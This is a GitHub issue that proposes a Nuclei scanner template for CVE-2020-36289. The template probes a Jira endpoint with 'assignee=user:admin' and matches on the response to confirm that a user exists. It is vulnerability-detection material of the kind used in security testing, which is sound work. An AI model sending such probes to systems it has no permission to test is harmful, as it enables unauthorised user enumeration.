### ISSUE TITLE
CVE-2020-36289

### ISSUE THREAD

**Issue by DhiyaneshGeek** [projectdiscovery/nuclei-templates#1660]
```yaml
id: CVE-2020-36289

info:
  name: CVE-2020-36289
  author: dhiyaneshDk
  severity: low
  tags: cve2020,jira
  reference: https://twitter.com/ptswarm/status/1402644004781633540

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
    matchers:
      - type: word
        words:
          - 'rel=\"admin\"'
        condition: and
```
